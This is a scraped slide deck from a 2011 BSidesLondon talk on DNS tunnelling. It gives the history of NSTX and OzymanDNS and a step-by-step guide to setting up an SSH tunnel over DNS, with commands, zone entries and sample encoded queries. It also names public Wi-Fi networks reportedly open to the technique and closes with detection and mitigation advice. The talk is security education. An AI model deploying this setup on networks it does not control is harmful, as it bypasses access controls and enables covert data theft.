Dns tunnelling its all in the name


Published on

BSidesLondon 20Th April 2011 - Arron "finux" Finnon
The presentations aim is to talk about how simple it is to deploy DNS Tunnelling infrastructure at little or no cost. Also shows how to establish a ssh connection from target to attacker, and act as a taster for peoples further research.
----- for more about @F1nux go to www.finux.co.uk

Published in: Technology

Dns tunnelling its all in the name

  1. 1. DNS Tunnelling, its all in the name! Arron “finux” Finnon finux@finux.co.uk http://www.finux.co.uk
  2. 2. Okay, DNS Tunnelling sounds a little complicated. You wont need a hard hat, a shovel or a drill, but you will need a shellaccount on a system which allows you control over port 53
  3. 3. However, it is very likely that it is illegal unless it is in your own test environment
  4. 4. So who am I, and why am I here?I ask the question every morning, I still havent answered it, but I maybe able to answer it for youMy Name is Arron, I have been involved in ethical hacking for a number of years. Im currently at The University ofAbertay Dundee as a student. I have spent sometime as asecurity consultant, and independent researcher. I have a reputation as being a little bit of a media/attention whore.I agree with that statement, so much so that I have a weekly podcast talking about geeky things: Finux Tech WeeklyI have over the years gave a number of talks on a range of things related to hacking and security.
  5. 5. So where can you find me? Email – finux@finux.co.uk Twitter – www.twitter.com/f1nux & www.twitter.com/finuxtechweeklyFacebook – www.facebook.com/finux Podcast Site – www.finux.co.uk Skype – finux1
  6. 6. Talk Out LineThe History InvolvedTechnical OverviewTools AvailableThose that “Bob” told me are effectedA short how to on one set-up/configuration optionOther potential uses for DNS TunnellingCountermeasuresLinksQ&A
  7. 7. DisclaimerWithout doubt the legal implications of using the discussed techniquesare immense. If you use this to obtain “Free Internet”, I would point outthat if you go to JAIL its not very free, and of course it could quitepossibly cost you a career too.If you have any doubt about the legalities of what you are doing thenSTOP it.If you do use this to break the law, and you do get caught. Your totallyon your own, this is for educational purposes only. Feel free to let meknow though, it will make a great anicdote and Im happy to write to youduring your stay.However as usual to defend we must know how to attack.“The art of war teaches us to rely not on the likelihood of the enemys not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.” - Sun TzuNot if the hacker comes, but when they come......
  8. 8. Intended AudienceHeres the shock! Hackers! However I mean the playful advocates oftechnology when I use that term. I tend not to buy into the mediadefinition of it.What I mean by hacker is;playful advocates of technology. If technical things excite you, then thisis for you.I love security, i love hacking, i love taking things apart and i believe its aprerequisite for our trade.As a good friend of mine, who is now the chief of operations for first base.A long haired geek that goes by the name of Pete Wood; if you werntelectoricuted by the age of 10 this might not be the trade for you. Improud to say i was shocked by 6, and Ill hazard a guess Im not the onlyone in this room.
  9. 9. A Small IntroIn September 2000 a post came across the Slashdot website informingits readers of an interesting use of DNS tunnelling for breaking out oflocked down networks. It utilises that most networks regardless of theirfirewall, or their Access Controls Lists, would allow DNS look ups.Researchers found with crafted packets that they could in fact establishbi-direction IP traffic, they delivered a protocol named NSTX.However this concept became more widely established when therespected DNS security researcher Dan Kaminsky, released his Ozymantool at Black hat in 2005, Kaminsky who in 2010 became one of ICANNsTrusted Community Representatives for the DNSSEC root certificate, hasan unparalleled reputation when it comes to DNS security and itinsecurities. Needless to say this release caught the attention of manysecurity researchers, however worrying nearly 11 years after thediscovery and 6 years since Kaminskys Ozyman tool release, thisvulnerability still lives on in a number of networks.All though DNS tunnelling could be seen as way to obtain free Internet oncaptive portals, it is also an effective tool in data theft. However it is hardto imagine the limitations when this is mixed with shellcodes. DNStunnelling could be used to reverse connect a shellcode from target toattacker, the tunnels effectiveness of traversing NAT makes it a worthydeployment.
  10. 10. Some HistorySo 1987 the the domain name protocol basically came into life, it wasdefined in the the RFC 1035. It superseded RFCs 882, 883, and 973.Around 13 years later a group of hackers started playing around with theconcept of DNS tunnelling. Mainly due to gain free internet from aMicrosoft update PPP dailins. Most of these Microsoft PPP dialins allowyou to use a Name server.These hackers later developed "NSTX Protocol", meaning "Name serverTransfer Protocol" in doing so they finally managed to use one ofMicrosoft toll free numbers in Germany and tunnel their net connectionover it.Iodine later became popular due to its password authentication howeverit was still very similar to NSTX.However as i have said i think it fair to say that the concept grabbed moreattention when respected breaker of DNS Dan Kaminsky released a setof scripts at Black Hat 2005 which were written in perl and in reality veryeasy to deploy. For the purpose of todays talk i will focus onOzymanDNS
  11. 11. Technical OverviewNow we could take this from the stand point of a captive portal, whichnormally intercepts all web traffic until some sort of authentication isachieved.However we see regularly that a they still enable DNS enquiries. I way tocheck this on a captive portal would be to use either dig or nslookup ifyour running windows. If you are issued a private address then your outof luck, however if you receive the IP address of the domain name inquestion then DNS requests are allowed out.So if we revisit the Domain Name Systems set-up, well see that it has 13root domain name servers responsible for the .coms, .orgs, so on and soforth known as the Top Level Domain names or TLD for short. They areresponsible down to the root domain such as example.com, then fromthere sub domains are delegated to their own server. Such astest.example.com. Each domain is configured in a zone file, and eachzone file has a number of records configured within it. So an examplewould be an A record which stands for an address record, or a CNAMEalias for an A record, we could see a MX record for handling mail, a NSrecord which points to a new DNS Server for that sub-domain, or a TXTrecord which handles text descriptions. It is the last two records thatinterest us.
  12. 12. Technical OverviewA hostname can only be 255 octets long, or 255 bytes. In addition a TXTrecord can also only be 255 bytes.So it lies within these 255 byte TXT records the potential for us to delivera payload of data back within one of these records.If we could encode a formatted domain name request up to a maximumof 255 bytes, and then have that decoded back at our fake domain nameserver.Our fake domain name server could encode our response back anddeliver that via a TXT record we now see the very plausible avenue oftransmitting data.
  13. 13. Technical OverviewSo what we would need in this situation is a fake domain name serverlistening on port 53, which will respond to requests, and a hostnamewhich is in fact a delegated NS record pointing to a fake DNS Server. Anexample would be;inbound.example.com would point to server.inbound.example.comThe zone file could look like this;inbound.example.com NS server.inbound.example.comserver.inbound.example.com A A record would point to our fake domain name server, and our clientwould make its requests to the inbound sub-domain.Of course if you where using DynDNS.org it could be a simple asinbound.example.com NS finux.dyndns.org
  14. 14. Technical OverviewNow a free account at DynDNS.org does not allow you to delegate NameServers. However freedns.afraid.org does. I happen to prefer the updateclient(s) on DynDNS, so I personally go for a freedns.afraid.org and pointit to a DynDNS account. Personally I think this makes the set-up slightlymore easier, and gives it an edge of portability.Now all DNS Tunnelling set-ups in some way use the delegated NameServers. Now I admit Im a Linux jock and so this configuration is basedon my experience with Linux, there is some links on how to do this with aWindows set-up at the end. My advice to you would be to build a VirtualMachine either running Ubuntu/Debian which of course will make itsdeployment in your test environment pretty easy.
  15. 15. Technical OverviewAs I have said for todays purpose well be looking at KaminskysOzymanDNS tool, in fact its a revised revision of it. OzymanDNS isbroken down into 4 perl scripts. The server script is named nomde.plwhich listens on a privileged port and in doing so requires sufficientpermissions to do it;sudo ./nomde.pl -i inbound.example.comThe above command would set OzymanDNS server section to listen toall requests on the sub-domain inbound.example.com
  16. 16. Technical OverviewNow the OzymanDNS client is written to encode/decode and send theresponses back via STDOUT which isnt overly useful however combinedwith the SSH config option "ProxyCommand" enables the ease of usethis set of scripts has become renowned for.ssh -o ProxyCommand="./droute.pl sshdns.inbound.example.com"user@localhostThe upstream data sent out will be encoded using Base32. After the datahas been transmitted, there is a unique ID due to some DNS requeststaking longer than others, the UDP protocol has no methods to checkthis. and either one of the keywords up or down, indicating whether thetraffics up- or downstream. Here is what an example request could looklike;ntez375sy2qk7jsg2og3eswo2jujscb3r43as6m6hl2wsxobm7h2olu4tmaq.lyazbf2e2rdynrd3fldvdy2w3tifigy2csrx3cqczxyhnxygor72a7fx47uo.nwqy4oa3v5rx66b4aek5krzkdm5btgz6jbiwd57ubnohnknpcuybg7py.63026-0.id-32227.up.sshdns.inbound.example.com
  17. 17. Technical OverviewThe response comes as a DNS TXT record. A TXT record can holdarbitrary ASCII data and can hold upper-case letters as well as lower-case letters and numbers. So the responses come encoded with Base64encoded. Such a response might look like the this.695-8859.id-39201.down.sshdns.inbound.example.com. 0 INTXT"AAAAlAgfAAAAgQDKrd3sFmf8aLX6FdU8ThUy3SRWGhotR6EsAavqHgBzH2khqsQHQjEf355jS7cTG+4a8kAmFVQ4mpEEJeBE6IyDWbAQ9a0rgOKcsaWwJ7GdngGm9jpvReXX7S/2oqAIUFCn0M8=""MHw9tR0kkDVZB7RCfCOpjfHrir7yuiCbt7FpyX8AAAABBQAAAAAAAAAA"
  18. 18. Technical OverviewSo a quick recap of what is needed on our Debian like system.We we need to install some perl packages;sudo apt-get install screen libnet-dns-perl libmime-base32-perlIn addition you may want to install ddclient as well and configure yourdynamic sub-domain to point to the server.Youll also need to set-up SSH as wellYou will want to download the OzymanDNS scripts, I have made thelatest version available on my site.wgethttp://finux.co.uk/demos/software/OzymanDNS-Splitbrain-Version.tar.gzNow as I have said the version of OzymanDNS is revised and the codecleaned up by Andreas Gohr of the Splitbrain.org websitehttp://www.splitbrain.org/blog/2008-11/02-dns_tunneling_made_simple
  19. 19. Technical OverviewOur client configuration is as follows;sudo apt-get install libnet-dns-perl libmime-base32-perlAnd then a simple command commandssh -o ProxyCommand="./droute.pl sshdns.inbound.example.com"user@localhost
  20. 20. Tools AvailableIodine is based on NSTX as i have mentioned is a Linux only tool,however it works via producing a virtual network interface on the serverand client, and those two virtual interfaces communicate with each other.Netcross is a little modular tool that might be useful in restricted networkconnectionsDNSCat is the basically NetCat for DNS
  21. 21. Those that “Bob” told me are effectedThe Cloud Network – Such as the ones that cover Weatherspoons pubsand McDonaldsBT Open ZoneA certain University in North East Scotland – Which will soon be fixedInterestingly over 3g it has been reported that T-Mobile allow unfetteredDNS queries. This could in fact be false, however if its true then reallyquite scary.Eastern TrainsRemember its easily tested, a nslookup or a dig should tell you withinseconds. Even if ping is blocked there is a good chance you could usethat to determine if the next work is vulnerable to attack, as it will stillobtain an IP address
  22. 22. Other potential uses of DNS TunnellingAs discussed covert communications over an otherwise restrictedchannel.Data theft, as in you do not allow any SSH, FTP, SFTP so on and soforth. scp works with the OzymanDNS set-upBy far the craziest I have seen is to deliver shell code via DNS Tunnels.The interesting concept with tunnelling a shellcode over DNS is forstarters this happens to null in void any potential NAT issuesThere is already a fair few PoC that highlight this concept. I have beenreading of recent how we could use some of the Metasploit payloads,combined with DNSCatI have not had time to play anywhere near as much with this as I wouldhave liked too. But needless to say Im sure Ill get my chance
  23. 23. CountermeasuresThe best way of detecting DNS tunnelling is by performing statisticalanomaly detection on the network.Some characteristics of a DNS tunnel include:High volume of DNS requests from internal clients where little usuallytake placeSignificant difference in the format of these lookups as compared toregular ones i.e. Base32 and Base64The total amount of data transferred over port 53 is much higher thanusualDNS Tunnelling could actually be one of the best covert channels everdesigned. In general, it proves quite challenging to stop this traffic, asthere is no specific indication that it concerns IP over DNS tunnelling.There are however a number of ways to mitigate the threat to a certaindegree.
  24. 24. CountermeasuresIf you are running a for-a-fee access point, consider having your DNSserver answer all queries with a local IP address until payment has beencompleted. Only afterwards should a client be able to perform DNSlookups that your server resolves to the internet.Many organizations do this currently by having HTTP requests rewrittento a local web server on which payment is due. This however still allowsthe client to resolve external domains, and as such, does not alleviate thecovert channel.A potential solution is to set up a BIND server which has a local entry forall TLDs: get lists here and here.Set up a wildcard entry for each of these domains that points to your localweb server that processes payments.Requests to any other domains or zones should not be handledrecursively.
  25. 25. CountermeasuresOne solution which is sometimes considered is to deny all queries forTXT records.The impact of this will in most cases would be limited, although certainfunctionality (such as SPF) may break.In general, only your incoming mail server will need to perform theselookups: taken a general split-DNS service on multiple servers, it shouldbe feasible to work around this issue.There are precious little reasons why the average internal client shouldbe able to perform lookups for TXT records.This approach is however fairly naive as tunnelling will still be possiblethrough other record types.You will not be able to disable these others, such as CNAME, due to theheavy production impact.Remember blocking a domain name with X amount of calls within aperiod seems a good idea, until you think about the lookups yourorganisation makes to google in an hour
  26. 26. ConclusionsIn conclusion I havent really scratched the surface of what can be donehere.The reality of it is, if your not looking at DNS traffic then someone maywell be doing so.Its has the potential to be still one of the best covert channels going andcan be very technically difficult to detect.The uses for this are really limited by your imagination.If you can use this with 3g technology then this could make somewhat ofa lethal weapon.However some pre-thought of what you could and should expect on yournetworkYou may think this connection would be slow, but within my links is apaper showing that speeds of up to 110 kilobytes a second
  27. 27. LinksSlashdot article on NSTX.http://slashdot.org/articles/00/09/10/2230242.shtmlKaminskys Wikipedia pagehttp://en.wikipedia.org/wiki/Dan_KaminskyKaminsky Release of the Tools he developedhttp://dankaminsky.com/2004/07/29/51/Kaminskys Black Hat paperhttp://www.doxpara.com/slides/BH_EU_05-Kaminsky.pdfDan Kaminskys 2005 Black hat talkhttp://www.splitbrain.org/blog/2008-11/02-dns_tunneling_made_simpleVery good guide on setting up DNS Tunnelshttp://dnstunnel.de/IVC Wikipedia article on DNS tunnellinghttp://beta.ivc.no/wiki/index.php/DNS_Tunneling
  28. 28. LinksAnother further guide to tunnelling DNShttp://www.h-i-r.net/2010/03/dns-tunneling-part-1-intro-and.htmlPDF paper from Black hathttp://www.blackhat.com/presentations/bh-usa-08/Miller/BH_US_08_Ty_Miller_Reverse_DNS_Tunneling_Shellcode.pdfHeyoka paperhttp://shakacon.org/talks/Revelli-Leidecker_Heyoka.pdfFurther guide to making to configuring OzymanDNS, however forWindows type systemshttp://cyberphob1a.wordpress.com/2008/02/10/dns-tunneling-part-i/http://cyberphob1a.wordpress.com/2008/02/11/speeding-up-dns-tunneling/http://cyberphob1a.wordpress.com/2008/03/08/dns-tunneling-updated-source/DNS RFCftp://ftp.rfc-editor.org/in-notes/rfc1035.txt
  29. 29. LinksAnother set of software for TCP over DNS this one using Java instead ofperlhttp://analogbit.com/tcp-over-dns_howtoFor Presentation Side Notes – Speeding Firefox for Low Bandwidthcarriershttp://www.ghacks.net/2008/07/13/optimize-firefox-for-low-traffic-volumes/DNScat as a Payload with Metasploithttp://www.skullsecurity.org/blog/2010/weaponizing-dnscat-with-shellcode-and-metasploitReverse DNS Tunneling Shellcode (v0.3) Technical Detailshttp://projectshellcode.com/?q=node/2In the following tutorial, we will use the tool dns2tcp written by two guysworking for HSC, a French security company.http://blog.rootshell.be/2007/03/22/dns2tcp-how-to-bypass-firewalls-or-captive-portals/http://www.hsc.fr/ressources/outils/dns2tcp/download/Traffic analysis approach to detecting DNS tunnelshttp://blog.vorant.com/2006/05/traffic-analysis-approach-to-detecting.htmlTunneling shit over DNShttp://www.modacity.net/forums/showthread.php?19755-Tunneling-shit-over-DNS
  30. 30. Questions & Answers ?
  31. 31. Thank You For Your Time I hope it has been of interestPlease feel free to come grab me later for a chat Dont forget to listen to the show www.finux.co.ukOn a side note, I have never been on a night out in London. So Ill apologise for tonight tomorrow morning